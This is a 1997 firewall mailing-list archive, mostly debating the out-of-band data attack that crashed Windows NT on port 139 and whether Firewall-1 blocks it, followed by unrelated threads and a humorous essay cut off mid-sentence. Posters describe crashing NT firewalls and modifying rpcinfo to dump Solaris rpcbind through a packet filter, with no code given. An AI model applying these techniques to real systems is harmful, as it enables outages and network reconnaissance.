Date: Thu, 5 Jun 1997 11:05:16 -0700 (PDT)
From: Mike Hedlund
To: Daniel Strawson
cc: Jyri Kaljundi, Greg Loffel, fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

If I remember
correctly, the OOB attack with NT only affected port 139, NetBIOS. I tried it
on all other TCP ports and it had no effect. So the only way Firewall-1 would
be affected by it would be if it has its own bug.. although I could be
mistaken.. if I am, someone please correct me. :)

-mike

On Thu, 5 Jun 1997, Daniel Strawson wrote:

> Hang on a moment.
>
> Let me put this in perspective.
>
> As I understand it, this problem results from sending packets with a
> particular IP option set in the header. (Please confirm I'm right here
> someone).
>
> Firewall _SHOULD_ drop all packets with IP options set. This would mean
> that all Firewall-1 systems and systems behind Firewall-1 are impervious
> to this attack. (something for Checkpoint to be proud of).
>
> Unfortunately this is not the case - as I say I've managed to get NT to
> crash with FW-1 installed.
>
> Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to
> crash, you get the NT system that it is running on to crash, so it is not
> an insecurity, but a claimed feature that doesn't work.
>
> So, either -
>
> - The IP Options drop code in FW-1 doesn't work.
>
> or
>
> - I do not properly understand this attack and it does not work as I
> imagine - in this case, please correct me.
>
> Cheers,
>
> Daniel
>
> On Thu, 5 Jun 1997, Jyri Kaljundi wrote:
>
> > On Wed, 4 Jun 1997, Daniel Strawson wrote:
> >
> > > We tried it and, yes we managed to crash an NT based Firewall-1 system.
> > > This is odd since (if memory serves) the packets should be dropped on the
> > > floor by the stateful inspection module.
> >
> > You mean you can crash an NT FW-1 by sending OOB data to it?!
> > That's scary if it is true and should be addressed by Check Point ASAP!
> >
> > What I have always thought of FW-1 is that it operates at quite low level
> > inside the OS kernel, that as long as you filter everything the network
> > bugs in the OS don't really matter, as the packets never reach FW-1.
> >
> > If sending some bytes of data to FW1 crashes it and the OS, this
> > combination (FW1+NT) should not be used as a firewall solution at all. May
> > be someone from CP could explain, how much do the bugs in the OS matter
> > once FW1 is installed.
> >
> > Jüri

From owner-firewalls-outgoing Thu Jun 5 21:31:03 1997
Message-Id: <199706051740.AA23817@interlock.reston.ans.net>
From: "Conrad Minor"
To: "Jyri Kaljundi", "Bryan D. Boyle"
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts
Date: Thu, 5 Jun 1997 13:39:32 -0400

All,

This of course doesn't address the problem with the FW1. It is just to refute
the notion that NT is a completely closed OS.

Any firewall worth its salt won't be running the native NT stack unmodified.
How, for example, would you plumb something like stateful inspection onto an NT
box without kernel changes?

There are several methods of modifying the stack to harden it against attack or
change the way it operates. The first would be to shim the stack, i.e. putting
a driver between the Ethernet card drivers and the stack itself. NT has built-in
support for this. Just read the DDK documentation.
NT 4.0 has even better support than 3.51 since Msoft has added calls that let
you dynamically hook into the NDIS stuff. This is in fact how RAS is
implemented (NDISWAN).

Another option of course is to replace the TCP stack altogether. Centri from
Global Internet does that. Check out their web page. They completely bypass
the Microsoft stack by building their own proprietary stack which intercepts
all packets coming to the firewall. They optionally will pass packets to the
Msoft stack depending on how your rules are configured.

Packet filter firewalls don't even need a TCP stack. Just hooks into the NDIS
routines that handle the reception and distribution of packets. Probably could
do this with another SHIM.

All of this is documented by Microsoft. The source code for sample drivers is
available as part of the DDK. While there are no sample SHIM drivers, a buddy
and I created one for NT 3.51 in about a month. It was really a matter of
combining an existing ethernet driver with an existing protocol driver and
making them talk to each other.

NT even has source level debugging at the kernel layer. Name some UNIX boxes
that support that (not to suggest that one is better than the other, just that
NT kernel work is easier. Streams are pretty damn elegant).

Conrad

----------
> From: Bryan D. Boyle
> To: Jyri Kaljundi
> Cc: firewalls@greatcircle.com
> Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
> Date: Thursday, June 05, 1997 9:46 AM
>
> At 03:08 PM 6/5/97 +0300, you wrote:
>
> >You mean you can crash an NT FW-1 by sending OOB data to it?!
> >That's scary if it is true and should be addressed by Check Point ASAP!
> >
>
> It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint,
> since the OS is not in their control. They can only operate (or be as
> secure as) at the least common denominator level of the underlying OS.
>
> >What I have always thought of FW-1 is that it operates at quite low level
> >inside the OS kernel, that as long as you filter everything the network
> >bugs in the OS don't really matter, as the packets never reach FW-1.
>
> Nothing except MS code operates in the NT kernel. This problem is with
> what happens when you send oob data to a stack (MS) that is tightly integrated
> with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS
> interface and control mechanism itself is crap.
>
> Of course, on UN*X systems, this is not the case. This is a signal example
> of the difference between designing for peer review of your security model
> and designing for what gets good trade publication reviews.
>
> >
> >If sending some bytes of data to FW1 crashes it and the OS, this
> >combination (FW1+NT) should not be used as a firewall solution at all. May
> >be someone from CP could explain, how much do the bugs in the OS matter
> >once FW1 is installed.
>
> If there is an overall architectural problem with NT as it is, then the OS
> bugs matter A LOT. But, of course, those that say you can trust a black box
> solution since the vendors are trustworthy are quite quiet on this regard...
>
> I would agree that you should ignore NT as an OS platform in a
> security solution right now. Just my opinion, $.02 US, etc.
>
> Flames to /dev/null.
> --
> Bryan D. Boyle            | LOGICAL: bdboyle@att.com 201-386-8584
> #include                  | VIRTUAL: http://www.access.digex.net/~bdboyle
> AT&T Laboratories, Inc.   | PHYSICAL: Whippany, NJ
>                           | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
> "What country can preserve its liberties, if its rulers are not warned
> from time to time, that its people preserve the spirit of resistance?"
> -Thomas Jefferson, 1787

From owner-firewalls-outgoing Thu Jun 5 21:46:02 1997
Message-Id: <3394C7E5.5F51@garanti.com.tr>
Date: Tue, 03 Jun 1997 18:41:58 -0700
From: Cihan Subasi
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
To: Firewall Mailing List
Subject: Help on SNG config...

For the first time I have to configure NAT on SNG.. one of our internal web
servers will be visible to outside... But there is not much in the manual,
Reserve addresses and Mapping, I have already done those but still I guess
something is missing; can anybody help me on that????
Thanks
--
***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey

email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404
Fax  = +902126570473
***************************************************************

From owner-firewalls-outgoing Thu Jun 5 22:11:34 1997
Message-Id: <33977065.5FC5@garanti.com.tr>
Date: Thu, 05 Jun 1997 19:05:25 -0700
From: Cihan Subasi
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
To: Firewall Mailing List
Subject: Unknown log entry...

I had these two lines in my firewall logs, can anybody explain to me what they
are???
--------------------------------------------------
Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.208.in-addr.arpa IN PTR", got type "CNAME"
Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa"
--------------------------------------------------

Thanks,
***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey

email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404
Fax  = +902126570473
***************************************************************

From owner-firewalls-outgoing Thu Jun 5 22:14:48 1997
Message-Id: <199706060344.XAA16853@pebbles.gtri.gatech.edu>
From: "Jim Jones"
To: Firewall Mailing List, csubasi@garanti.com.tr
Date: Thu, 5 Jun 1997 23:43:34 +0000
Subject: Re: Limiting Mail size..
In-reply-to: <339773DE.3884@garanti.com.tr>

Sendmail? Use the delivery agent M= equate, set it for any delivery agents you
want to limit. (page 388 of my now old Costales "Sendmail" book).

or

Use checkcompat(). (page 195 of same).
-Jim

> Date: Thu, 05 Jun 1997 19:20:14 -0700
> From: Cihan Subasi
> Reply-to: csubasi@garanti.com.tr
> Organization: Garanti Ticaret
> To: Firewall Mailing List
> Subject: Limiting Mail size..
>
> It is out of topic but how can I limit inbound and outbound email
> size...
>
> Thanks,
> --
> ***************************************************************
> Cihan Subasi
> Garanti Ticaret, Istanbul Turkey
>
> email= cihans@garanti.com.tr or csubasi@garanti.com.tr
> Phone= +902126570404
> Fax  = +902126570473
> ***************************************************************

From owner-firewalls-outgoing Thu Jun 5 22:30:46 1997
Date: Thu, 5 Jun 1997 14:49:13 -0700 (PDT)
From: "James W. Abendschan"
To: firewalls@greatcircle.com
Subject: Re: [SNI-14]: Solaris rpcbind vulnerability (fwd)

On Wed, 4 Jun 1997, Oliver Friedrichs wrote:

> Secure Networks Inc.
>
> Security Advisory
> June 4, 1997
>
> Solaris rpcbind weaknesses

[ ... ]

When I saw this a few weeks ago on SNI's web page (it wasn't published as an
advisory, it was published as one of the checks their Ballista tool performs)
I was intrigued, so I sat down and spent some time trying to exploit this.
By modifying rpcinfo.c to connect to port 32771 and changing the PMAPPROC_DUMP
stuff to work over UDP instead of TCP (clntudp_create), you can get a nicely
functional "over-the-packet-filter" rpc dump. If there's interest, I'll post
diffs.

Now the *real* trick is figuring out how to get Solaris NFS to give up its
export list over another high-numbered port..

James

--
James W. Abendschan              jwa@jammed.com
JAMMED Systems, Inc.             http://www.jammed.com
"Turing," she said. "You are under arrest." -- William Gibson

From owner-firewalls-outgoing Thu Jun 5 22:39:28 1997
From: Adam Shostack
Message-Id: <199706051640.MAA06916@homeport.org>
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts
In-Reply-To: <199706051346.JAA02854@hogpb.ho.att.com> from "Bryan D. Boyle" at "Jun 5, 97 09:46:02 am"
To: bdboyle@att.com (Bryan D. Boyle)
Date: Thu, 5 Jun 1997 12:40:33 -0400 (EDT)
Cc: jk@stallion.ee, firewalls@GreatCircle.COM

A friend suggests that the problem may be that the FW1 is passing code upwards
to the NT stack. FW1 sits beneath the stack, and intercepts packets before
they can do damage. However, if you configure the firewall to allow packets to
the NT stack, then NT will crash.
I'll point out that if this is so, then an Application Proxy* probably would
not exhibit the same behavior, since it would rebuild the IP packet, instead
of sending the OOB packet on to its destination when it hits an "OK" rule.

Adam

* Application Proxy in the archetypal sense. I have not tested any to see how
they handle this.

Bryan D. Boyle wrote:
| At 03:08 PM 6/5/97 +0300, you wrote:
|
| >You mean you can crash an NT FW-1 by sending OOB data to it?!
| >That's scary if it is true and should be addressed by Check Point ASAP!
| >
|
| It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint,
| since the OS is not in their control. They can only operate (or be as
| secure as) at the least common denominator level of the underlying OS.

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From owner-firewalls-outgoing Thu Jun 5 22:39:32 1997
Message-Id: <199706051842.OAA09090@kryten.frb.gov>
To: Cy Ardoin
Cc: "Jonathan M. Bresler", Firewalls@GreatCircle.COM
Subject: Re: PIX and FW-1 (packet filter Question)
In-Reply-To: Your message of "Thu, 05 Jun 1997 14:11:33 EDT."
Date: Thu, 05 Jun 1997 14:42:53 -0400
From: "Jonathan M. Bresler"

>On Thu, 5 Jun 1997, Jonathan M. Bresler wrote:
>
>> >I don't think there is anything an application firewall can
>> >do that can't also be done by a "packet filter" firewall. The
>>
>> trivial example:
>> a smtp application level proxy can disable the "debug" command
>> for every sendmail behind that firewall.
>
>Finding and removing the "debug" command from smtp connections at the
>packet layer isn't much different than finding and altering the PORT and
>PASV part of the FTP command and all the NAT style packet filters
>modify the FTP commands. It's not something packet filters do, but
>it is no more difficult than many of the things they already do.

Cy, the difficulty of implementing this is not the point. The point is that
application level proxies provide this. Packet filters, stateful or not, do
not provide this. Ain't hard to apply a tourniquet, but until it's applied,
someone bleeds to death ;)

jmb

From owner-firewalls-outgoing Thu Jun 5 23:57:09 1997
From: carson@lehman.com
Date: Thu, 5 Jun 1997 16:36:54 -0400
Message-Id: <199706052036.QAA19850@dragon.lehman.com>
To: Anton J Aylward
Cc: Bernd Eckenfels, firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
In-Reply-To: <3.0.32.19970605082442.0094c5f0@the-wire.com>
Reply-To: carson@lehman.com

>>>>> "Anton" == Anton J Aylward writes:

Anton> I believe this is a problem in information content. The HOST
Anton> command, as Bernd says, is not implemented widely enough to make it
Anton> practical. The people who talk about kernel hack support for a
Anton> plug-gw solution have not made it clear how the lost information is
Anton> to be regenerated.

It's never lost in the first place. You set up static NAT and have the
firewall as the route for that subnet. It's just like using virtual interfaces
(and consumes the same amount of address space).

The only other way of doing things is to assume that the Host: header is
present, and provide a "which site did you _really_ mean" page/script for
queries lacking said header.
--
-- Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com
http://www.cs.columbia.edu/~carson/home.html

From owner-firewalls-outgoing Fri Jun 6 00:16:08 1997
Date: Thu, 5 Jun 1997 11:01:48 -0500
From: Craig Brozefsky
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
To: Daniel Strawson
cc: Jyri Kaljundi, Greg Loffel, fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list

On Thu, 5 Jun 1997, Daniel Strawson wrote:

> Hang on a moment.
>
> Let me put this in perspective.
>
> As I understand it, this problem results from sending packets with a
> particular IP option set in the header. (Please confirm I'm right here
> someone).
>
> Firewall _SHOULD_ drop all packets with IP options set. This would mean
> that all Firewall-1 systems and systems behind Firewall-1 are impervious
> to this attack. (something for Checkpoint to be proud of).

Uhm, I don't have any RFCs or source code in front of me right now, but my
understanding was that several options would need to get through, OOB being
one of them, as some applications make use of it, telnet for instance if I'm
not mistaken (though I may be and invite correction).

> Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to
> crash, you get the NT system that it is running on to crash, so it is not
> an insecurity, but a claimed feature that doesn't work.

Not how I would interpret it.
I would consider this the responsibility of the FW vendor. They are
responsible for the TCP/IP stack IMO. If they aren't replacing it, then they
are assuming the OS vendor is competent, not something I would agree with.

Craig Brozefsky                  craig@onshore.com
onShore Inc.                     http://www.onshore.com/~craig
Development Team                 p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Fri Jun 6 00:31:30 1997
Message-Id: <199706060722.AAA16788@notesgw2.sybase.com>
To: firewalls
From: Ryan Russell/SYBASE
Date: 6 Jun 97 0:29:07 EDT
Subject: Stateful Packet Filters vs. Proxies

Well, I finally got around to writing down my arguments on the above subject.
Check it out at:

http://futon.sfsu.edu/~rrussell/spfvprox.htm

Warning: It's lengthy.

Comments welcome.
Ryan

From owner-firewalls-outgoing Fri Jun 6 00:46:07 1997
Date: Thu, 5 Jun 1997 22:38:10 -0500
From: Craig Brozefsky
Subject: Re: PIX and FW-1 (packet filter Question)
To: Firewalls@GreatCircle.COM

On Thu, 5 Jun 1997, Cy Ardoin wrote:

> On Thu, 5 Jun 1997, Jonathan M. Bresler wrote:
>
> > >I don't think there is anything an application firewall can
> > >do that can't also be done by a "packet filter" firewall. The
> >
> > trivial example:
> > a smtp application level proxy can disable the "debug" command
> > for every sendmail behind that firewall.
>
> Finding and removing the "debug" command from smtp connections at the
> packet layer isn't much different than finding and altering the PORT and
> PASV part of the FTP command and all the NAT style packet filters
> modify the FTP commands. It's not something packet filters do, but
> it is no more difficult than many of the things they already do.

Uhm, how about provide authentication at the firewall, like SecureID (yuck) or
CryptoCard, or even just APOP for a POP3 proxy? How about provide an SMTP
daemon capable of accepting mail, but not requiring anything more than putting
it into a directory for another, non-privileged daemon to forward to a
full-featured MTA that is unaccessible to the outside world?
This SMTP daemon on the firewall being a very simple beast and leaving much
less room for fuckup in code and design than, let's say, letting packets go
through to a full-featured MTA, like uhm, sendmail maybe, or Exchange, or
Netscape's Mail Server, and having to modify your packet filter to block out
attacks as they are published. Surely a lot more work than putting SMAPD on
your firewall and not having to worry about tracking bugs in your full MTA (or
at least a very large class of bug).

Or filter HTTP based on MIME type and response size.

Hand waving and 'well it could' doesn't get you much of anywhere though, not
to imply that this is what you're doing, but just pointing out that theory is
wonderful and very useful, but when it comes to 'capabilities' assessments
like this, it's often better to stay within the somewhat agreed upon realm of
reality.

Craig Brozefsky                  craig@onshore.com
onShore Inc.                     http://www.onshore.com/~craig
Development Team                 p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Fri Jun 6 01:32:37 1997
Message-Id: <3.0.32.19970605180152.006d0788@brussels.cisco.com>
Date: Thu, 05 Jun 1997 18:01:53 +0000
To: Daniel Strawson, Jyri Kaljundi
From: Eric Vyncke
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
Cc: Greg Loffel, fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Daniel,

Out-of-band data, also called urgent data, is a harmless option which is used
in some cases (I think FTP abort and some Telnet). It is not a dangerous option
like source routing, ... which by the way are not put in the fixed IP header
but in the variable part of the IP header.

Bottom line: out-of-band data is harmless and firewalls should allow this data
to go through (and not break when finding one...).

Eric

At 14:24 5/06/97 +0100, Daniel Strawson wrote:
>
>Hang on a moment.
>
>Let me put this in perspective.
>
>As I understand it, this problem results from sending packets with a
>particular IP option set in the header. (Please confirm I'm right here
>someone).
>
>Firewall _SHOULD_ drop all packets with IP options set. This would mean
>that all Firewall-1 systems and systems behind Firewall-1 are impervious
>to this attack. (something for Checkpoint to be proud of).
>
>Unfortunately this is not the case - as I say I've managed to get NT to
>crash with FW-1 installed.
>
>Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to
>crash, you get the NT system that it is running on to crash, so it is not
>an insecurity, but a claimed feature that doesn't work.
>
>So, either -
>
> - The IP Options drop code in FW-1 doesn't work.
>
> or
>
> - I do not properly understand this attack and it does not work as I
> imagine - in this case, please correct me.
>
>Cheers,
>
>Daniel
>
>On Thu, 5 Jun 1997, Jyri Kaljundi wrote:
>
>> On Wed, 4 Jun 1997, Daniel Strawson wrote:
>>
>> > We tried it and, yes we managed to crash an NT based Firewall-1 system.
>> > This is odd since (if memory serves) the packets should be dropped on the
>> > floor by the stateful inspection module.
>>
>> You mean you can crash an NT FW-1 by sending OOB data to it?!
>> That's scary if it is true and should be addressed by Check Point ASAP!
>>=20 >> What I have always thought of FW-1 is that it operates at quite low level >> inside the OS kernel, that as long as you filter everything the network >> bugs in the OS don't really matter, as the packets never reach FW-1.=20 >>=20 >> If sending some bytes of data to FW1 crashes it and the OS, this >> combination (FW1+NT) should not be used as a firewall solution at all.= May >> be someone from CP could explain, how much do the bugs in the OS matter >> once FW1 is installed. >>=20 >> J=FCri >>=20 >>=20 > Eric Vyncke =20 Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 01:37:53 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA04321 for firewalls-outgoing; Thu, 5 Jun 1997 20:12:01 -0700 (PDT) Received: from www.valuu.net (www.valuu.net [204.252.40.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA04222 for ; Thu, 5 Jun 1997 20:11:39 -0700 (PDT) Received: from fd.valuu.net ([204.252.40.3]) by www.valuu.net (post.office MTA v1.9.1 ID# 0-11837) with SMTP id AAA430 for ; Thu, 5 Jun 1997 23:17:36 -0400 Received: by fd.valuu.net with Microsoft Mail id <01BC7206.0E15A100@fd.valuu.net>; Thu, 5 Jun 1997 23:13:19 -0400 Message-ID: <01BC7206.0E15A100@fd.valuu.net> From: rabbi@www.valuu.net (Rabbi Haim Cassorla) To: "'firewalls@GreatCircle.COM'" Subject: FW: [FW1] Out of Band Data Attack against NT-Hosts Date: Thu, 5 Jun 1997 23:13:17 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Microsoft has a fix for OOB which can only be applied after SP3 for NT4 = Both SP3 and the OOB Fix are available at their FTP site. Shalom Rabbi ---------- From: Pete Vickers[SMTP:pvickers@adtranz-signal.co.uk] Sent: Thursday, June 05, 1997 2:05 PM To: Jyri Kaljundi; 'Bryan D. 
Boyle' Cc: firewalls@GreatCircle.COM Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts i was under the impression that since FW-1 only supported serveral net = i/f cards that they rewrote the drivers for these, and thus managing to = get between the OS and the card h/w. [pls correct me if i'm wrong, this was only an assumption !] Pete ---------- From: Bryan D. Boyle Sent: 05 June 1997 13:46 To: Jyri Kaljundi Cc: firewalls@GreatCircle.COM Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts At 03:08 PM 6/5/97 +0300, you wrote: >You mean you can crash and NT FW-1 by sending OOB data to it?! >That's scary if it is true and should be addressed by Check Point ASAP! > It is a bogosity with NT and not with FW1. Can't be addressed by = Checkpoint,=20 since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS. >What I have always thought of FW-1 is that it operates at quite low = level >inside the OS kernel, that as long as you filter everything the network >bugs in the OS don't really matter, as the packets never reach FW-1.=20 Nothing except MS code operates in the NT kernel. This problem is with=20 what happens when you send oob data to a stack (MS) that is tightly = integrated with the OS (FW1 runs on top of this stuff, not in it...) and the = stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case. This is a signal = example of the difference between designing for peer review of your security = model and designing for what gets good trade publication reviews. =20 > >If sending some bytes of data to FW1 crashes it and the OS, this >combination (FW1+NT) should not be used as a firewall solution at all. = May >be someone from CP could explain, how much do the bugs in the OS matter >once FW1 is installed. If there is an overall architectural problem with NT as it is, then the = OS bugs matter A LOT. 
But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet on this regard...

I would agree that you should ignore NT as an OS platform in a security solution right now.

Just my opinion, $.02 US, etc. Flames to /dev/null.

--
Bryan D. Boyle          | LOGICAL:    bdboyle@att.com 201-386-8584
#include                | VIRTUAL:    http://www.access.digex.net/~bdboyle
AT&T Laboratories, Inc. | PHYSICAL:   Whippany, NJ
                        | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
"What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787

From owner-firewalls-outgoing Fri Jun 6 01:50:06 1997
From: "Feeney, Tim"
Date: Thu, 5 Jun 1997 15:09:00 -0400
To: firewalls@GreatCircle.COM
Subject: RE: ISP Connection

>From: BLeBlanc@igate.sprint.com
>
>Having a third party perform the administrative functions must be
>determined by weighing many factors. You need to decide:
>
>"Which security technology is best for my environment? (based on your
>security policy - what type(s) of security need to be deployed?
>Firewall? Strong Authentication? Encryption? and what/who are you trying
>to secure?)
>
>"Who are the respected and reliable vendors in the market?" (this must
>include the third party that you are considering doing the management,
>as well as, the vendor/manufacturer of the security products
>themselves).

A bit beyond the respect and reliability factor is the security factor for the vendor. You need to check to see that their systems are secured properly so that a successful attack on the vendor does not compromise your company. In addition, if your company does exhaustive background checks on employees then the vendor's background checks for their employees should be at the same level or higher. Remember that the vendor now has access to your internal network and can "spy" on you without you even knowing. In addition, make sure that your machine is fairly isolated from the vendor's other customers' machines, as these customers could have access to your network if the setup of the vendor's network allows it.

>Obviously, monetary cost factors come in to play. Whether you buy the
>hardware/os/software and manage the components in-house -vs- you
>out-source these to a third party and pay month-to-month.
>
>Do you have the staff to manage the firewall in-house? (A firewall is
>NOT a collateral duty to be assigned to a data center's staff that has
>no background in firewalls). What level of expertise does the
>third-party have? (Your third-party vendor should have a significantly
>sized team of security engineers that have substantial background and
>knowledge in the security areas you need/choose).

I would also suggest that you bring someone up to speed on security mechanisms and issues. It would behove you to have someone that could check that the vendor is doing things in the proper manner. This person need not have expertise in installing and setting up secure environments but should at least know the ramifications of, and defense against, various attacks and setups.

>What standard services does the third party perform? You (the customer)
>must have the ability to sit with the third party and "design a
>unique-to-you" security service. YOU must be able to determine the
>rules. You must have the power to change those rules at any time
>(24*7*365).
>
>What value-added services does the third party perform? Do they perform
>monitoring for suspicious activity? Do they perform backups on all of
>the critical files and maintain them off-site (this should be part of
>your disaster recovery plan for all systems)? Do they provide you with
>a detailed report of what happened on the firewall?
>
>Once you have weighed these issues (these being a sample of the total
>questions you need to ask yourself and the third-party provider), you
>should be able to make a determination on whether to handle the task
>in-house or out-source.

On a bit of a side note: I have dealt with BBN and come to feel that they are a very professional and knowledgeable group. However, be prepared to go through a few steps to make changes or updates to your system. They require certain procedures to be followed before any change is implemented. This is a good thing but it does tend to slow the change process up a bit.

Tim

From owner-firewalls-outgoing Fri Jun 6 01:59:29 1997
From: proff@suburbia.net
Date: Wed, 4 Jun 1997 02:03:43 +1000 (EST)
To: firewalls@greatcircle.com
Subject: Cryptographic Mythology

Here is something to amuse, delight and horrify - the tail of:

    _One Man's Search for a Cryptographic Mythology_.

I recently wrote a VNODE (4.4bsd) based encrypted file-system. Now the day dawned when I decided it was high time to discard my rather egocentric working name _Proffs_ (i.e. Proff File System) and cast about for a decent, respectable name. My first thought on this matter was:

    CERBERUS, n. The watch-dog of Hades, whose duty it was to guard the
    entrance -- against whom or what does not clearly appear; everybody,
    sooner or later, had to go there, and nobody wanted to carry off the
    entrance. Cerberus is known to have had three heads, and some of the
    poets have credited him with as many as a hundred.

Only, what was the relation between KERBEROS and CERBERUS? Pups from the same litter, or was the relationship a little more incestuous?
I had to find out. There was no way - n o w a y - I'd be having my encrypted file system playing second fiddle to that evil authentication beast.

    KERBEROS; also spelled Cerberus. n. The watch dog of Hades, whose duty
    it was to guard the entrance--against whom or what does not clearly
    appear; . . . it is known to have had three heads. . .

Mythology couldn't get any more incestuous than that. 450,000 bytes of Greek polytheism later, and I'm wondering if the Gods of Olympus really had any high-paid guards to speak of except the multi-headed mongrel from Hades. I'm feeling down. I'm cursing the Ancients. I'm disrespectfully humming tunes `All and All it's Just Another Greek in the Wall', and `Athena be my Lover' when I discover:

    JANUS: in Roman mythology, custodian of the universe, god of
    beginnings. The guardian of gates and doors, he held sacred the first
    hour of the day, first day of the month, and first month of the year
    (which bears his name). He is represented with two bearded faces set
    back to back.

Custodian of the universe. Guardian of gates and doors. Cooool. Janus. January. I like it. Only while I'm liking it, I'm thinking that I've heard the word Janus a lot before. I'm thinking it isn't just me who has looked up from the middle of a Greek mythology text, whilst in the throes of a name hunt, with the words "Cooool" on their tongue. No: the Gods just don't smile on me that way. AltaVista confirms the truth of Heaven's bad attitude towards me. 17,423 references. _The Janus Mutual Trade Fund_, _The Janus Project_, _Janus ADA95_, a dozen ISPs from Canada (what is it WITH these Canadians?), _Janus' cool word list_ (turns out to be not so cool), _The Janus Ensemble_, _Hotel Janus_, _Janus Theatre_, _janus.com_, _janusfunds.com_, _Janus_ an Australian Police drama series and of course, the sixth moon of Saturn - _Janus_.

Janus is out-of-the-picture. I'm not sure whether to feel smug or grim about the rest of the world's lack of originality.

Guards. Guardians. The Greeks didn't have many with bite and I'm losing patience with the whole culture. Euphrosyne, Aglaia, and Thalia do not grace me. What I need is something that evokes passion within my cryptographic domain. And when you come down to it, that means something which produces copious amounts of gore and blood, at will, from those who would dare to pass its demesne of protection.

    The Erinyes, or Furies, were three goddesses who punished by their
    secret stings the crimes of those who escaped or defied public
    justice. The heads of the Furies were wreathed with serpents, and
    their whole appearance was terrific and appalling. Their names were
    Alecto, Tisiphone, and Megaera. They were also called Eumenides.

Aye. Plenty of gore there. But somewhat lacking in cryptographic analogy. Fantastic material for the group that doesn't meet at number 41 every Saturday night though. They will appreciate what the Erinyes were trying to achieve. Somewhat heartened, my mind turns to the Erinyes' dress sense. "..heads of the Furies were wreathed with serpents, and their whole appearance was terrific and appalling". Terrific. Serpents.

    Terrific \Ter*rif"ic\, a. [L. terrificus; fr. terrere: to frighten +
    facere: to make. See Terror, and Fact.] Causing terror; adapted to
    excite great fear or dread; terrible; as, a terrific form; a terrific
    sight.

Is it a symptom of society in decay that this word has come to mean:

    Excellent \Ex"cel*lent\, a. [F. excellent, L. excellens, -entis, p.
    pr. of excellere. See Excel.] 1. Excelling; surpassing others in some
    good quality or the sum of qualities; of great worth; eminent, in a
    good sense; superior, as an excellent man, artist, citizen, husband,
    discourse, book, song, etc.; excellent breeding, principles, aims,
    action.

Or as Milton would say:

    To love . . . What I see excellent in good or fair.

On the other hand, David Hume (1711-1776):

    The more exquisite any good is, of which a small specimen is afforded
    us, the sharper is the evil, allied to it; and few exceptions are
    found to this uniform law of nature. The most sprightly wit borders
    on madness; the highest effusions of joy produce the deepest
    melancholy; the most ravishing pleasures are attended with the most
    cruel lassitude and disgust; the most flattering hopes make way for
    the severest disappointments. And, in general, no course of life has
    such safety (for happiness is not to be dreamed of) as the temperate
    and moderate, which maintains, as far as possible, a mediocrity, and
    a kind of insensibility, in every thing.

Perhaps it is the sign of a brain in decay, rather than a society, that I dwell on it so, because Terrific hair serpents of course lead unfailingly into the arms of the Medusa. A guardian of fearsome looks, but dubious motivations according to authorities like Clash of the Titans (1981). A moot point, perhaps, as Princeton's history department no longer wants to talk to me. I'm cast adrift, to rely on my Plasticine childhood memories and the mythological swamp of the web.

    NAME: Medusa
    FAVORITE PASTIME: Turning men to stone
    PLACE OF ORIGIN: Los Alamos Secret CIA Lab
    SPECIAL GIFTS: Petrified Aggregate Projectist
    FAVORITE MOVIE: Mighty Morphin' Power Rangers
    GOALS IN LIFE: To be a nice person
    FAVORITE BOOK: Madonna's biography
    PET PEEVE: Bad hair days

Jesus. I've been sucked into comic book hell. Princeton, take me back. I won't curse at the ancient Greeks' sexual proclivities anymore. I'm sure chaste marriages were very daunting to those yet to have them. I was only joking. Lighten up will you? But, alas, the history faculty was still nursing its wounds, and was not ready to forgive me. I'd have to find an authoritative source somewhere else. Perhaps I could filter out the comic book hell contaminants and come up with respected history Ivy, even if it wasn't Princeton Ivy.

    To decapitate - to castrate. The terror of the Medusa is thus a terror
    of castration that is linked to the sight of something. The hair upon
    the Medusa's head is frequently represented in works of art in the
    form of snakes, and these once again are derived from the castration
    complex. It is a remarkable fact that however frightening they may be
    in themselves, they nevertheless serve as a mitigation of the horror,
